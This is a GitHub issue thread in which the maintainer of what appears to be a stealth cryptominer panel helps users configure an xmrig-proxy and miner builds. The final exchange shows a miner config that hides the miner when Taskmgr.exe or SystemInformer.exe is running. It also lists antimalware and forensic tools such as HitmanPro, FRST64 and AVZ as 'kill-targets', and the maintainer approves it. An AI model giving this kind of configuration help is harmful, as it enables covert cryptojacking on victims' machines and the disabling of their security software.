### ISSUE TITLE
XMRIG PROXY

### ISSUE THREAD

**Issue by svox07** [UnamSanctam/UnamWebPanel#378]
hi Unam, help Xmrig -Proxy, can you give me the configured config.json, I can’t configure it with errors
![IMG_20240715_012433_024](https://github.com/user-attachments/assets/369deff9-bce7-4208-b0d3-3a9985f5af44)

**Comment by UnamSanctam** [comment]
What kind of configuration do you want? But I would probably advice using "nicehash" mode instead of "simple" mode in the xmrig-proxy if you can.

**Comment by svox07** [comment]
https://zephyr.miningocean.org

**Comment by svox07** [comment]
{
    "access-log-file": null,
    "access-password": null,
    "algo-ext": true,
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
        "host": "127.0.0.1",
        "port": 0,
        "access-token": null,
        "restricted": true
    },
    "background": false,
    "bind": [
        {
            "host": "0.0.0.0",
            "port": 4444,
            "tls": true
        },
        {
            "host": "::",
            "port": 4444,
            "tls": true
        }
    ],
    "colors": true,
    "title": true,
    "custom-diff": 0,
    "custom-diff-stats": false,
    "donate-level": 0,
    "log-file": null,
    "mode": "simple",
    "pools": [
        {
            "algo": "rx/0",
            "coin": zephyr,
            "url": "de-zephyr.miningocean.org:5452",
            "user": "Wallet",
            "pass": "ZEP",
            "rig-id": null,
            "keepalive": true,
            "enabled": true,
            "tls": true,
            "tls-fingerprint": null,
            "daemon": false
        }
    ],
    "retries": 2,
    "retry-pause": 1,
    "reuse-timeout": 0,
    "tls": {
        "enabled": true,
        "protocols": null,
        "cert": null,
        "cert_key": null,
        "ciphers": null,
        "ciphersuites": null,
        "dhparam": null
    },
    "user-agent": null,
    "syslog": false,
    "verbose": false,
    "watch": true,
    "workers": true
}

**Comment by UnamSanctam** [comment]
You need quotes (") around the zephyr string, it's also probably best to use nicehash mode instead of simple mode:
```
{
    "access-log-file": null,
    "access-password": null,
    "algo-ext": true,
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
        "host": "127.0.0.1",
        "port": 0,
        "access-token": null,
        "restricted": true
    },
    "background": false,
    "bind": [
        {
            "host": "0.0.0.0",
            "port": 4444,
            "tls": true
        },
        {
            "host": "::",
            "port": 4444,
            "tls": true
        }
    ],
    "colors": true,
    "title": true,
    "custom-diff": 0,
    "custom-diff-stats": false,
    "donate-level": 0,
    "log-file": null,
    "mode": "nicehash",
    "pools": [
        {
            "algo": "rx/0",
            "coin": "zephyr",
            "url": "de-zephyr.miningocean.org:5452",
            "user": "Wallet",
            "pass": "ZEP",
            "rig-id": null,
            "keepalive": true,
            "enabled": true,
            "tls": true,
            "tls-fingerprint": null,
            "daemon": false
        }
    ],
    "retries": 2,
    "retry-pause": 1,
    "reuse-timeout": 0,
    "tls": {
        "enabled": true,
        "protocols": null,
        "cert": null,
        "cert_key": null,
        "ciphers": null,
        "ciphersuites": null,
        "dhparam": null
    },
    "user-agent": null,
    "syslog": false,
    "verbose": false,
    "watch": true,
    "workers": true
}
```

**Comment by svox07** [comment]
if I use nicehash the hash jumps in my pool

**Comment by UnamSanctam** [comment]
Jumps? But that could be due to the higher difficulty (since there are less pool connections).

**Comment by svox07** [comment]
the rest of the settings are correct?  And in the build itself I want to put sport.com:4444 and remove the wallet from there and the worker’s name?

**Comment by UnamSanctam** [comment]
Yes the rest look correct, and yes you can put your xmrig-proxy connection directly in the build without any wallet or worker name (since they aren't needed).

**Comment by svox07** [comment]
Is it possible to reduce the complexity of config.json? if so, where should it be changed?

**Comment by svox07** [comment]
![IMG_20240715_015244_488](https://github.com/user-attachments/assets/b37256b4-7d72-4c52-a673-708a97d710c4)

**Comment by UnamSanctam** [comment]
>Is it possible to reduce the complexity of config.json? if so, where should it be changed?

You mean the length? In that case you can probably remove most options that you haven't changed, since they most likely have a default value if not present inside the JSON:
```
{
    "bind": [
        {
            "host": "0.0.0.0",
            "port": 4444,
            "tls": true
        },
        {
            "host": "::",
            "port": 4444,
            "tls": true
        }
    ],
    "donate-level": 0,
    "mode": "nicehash",
    "pools": [
        {
            "algo": "rx/0",
            "coin": "zephyr",
            "url": "de-zephyr.miningocean.org:5452",
            "user": "Wallet",
            "pass": "ZEP",
            "keepalive": true,
            "enabled": true,
            "tls": true
        }
    ]
}
```



> ![IMG_20240715_015244_488](https://private-user-images.githubusercontent.com/70852343/348569770-b37256b4-7d72-4c52-a673-708a97d710c4.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA5OTA2ODgsIm5iZiI6MTcyMDk5MDM4OCwicGF0aCI6Ii83MDg1MjM0My8zNDg1Njk3NzAtYjM3MjU2YjQtN2Q3Mi00YzUyLWE2NzMtNzA4YTk3ZDcxMGM0LmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE0VDIwNTMwOFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTE4OTRjMWY2ODIxYzg1NDU2YzcxOWY1NzdlNjRlYmU4MjA3ZmIwOTZhZDA0YjFhODNlNzM0ZTZlN2FmZDU2N2YmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.v6HJureRK3LugpuXBUmQ7wxvJYbWZWzmye6lzqn1SAE)

Yes that's correct.

**Comment by svox07** [comment]
![Screenshot_20240715-015743](https://github.com/user-attachments/assets/5d2a0188-f58f-443b-8cc5-7ede9f6a0409)
is this correct here?

**Comment by UnamSanctam** [comment]
Yes SSL is preferred since it will encrypt all the traffic, also enable SSL/TLS in the "Mining" tab of the miner.

**Comment by svox07** [comment]
thanks for the help

**Comment by VK-VZ** [comment]
Sorry, I also have one question.  I'm in the link pastbin what settings to set the proxy!

{ 
"algo": "rx/0", 
"pool": "87.13.127.36", 
"port": 4444, 
"wallet": "", 
"password": "", 
"nicehash": true, 
"ssltls": true, 
"max-cpu": 30, 
"idle-wait": 2, 
"idle-cpu": 80, 
"stealth": true, 
"stealth-targets": Taskmgr.exe,SystemInformer.exe,...etc
"kill-targets": regedit.exe,SecurityCheck.exe,avz5rn.exe,HitmanPro_x64.exe,HitmanPro.exe,AnVir.exe,AVbr.exe,taskhostw.exe,start.exe,FRST64.exe,...etc

Is that right?  Or maybe something needs to be removed?

**Comment by UnamSanctam** [comment]
Yes that all looks right.
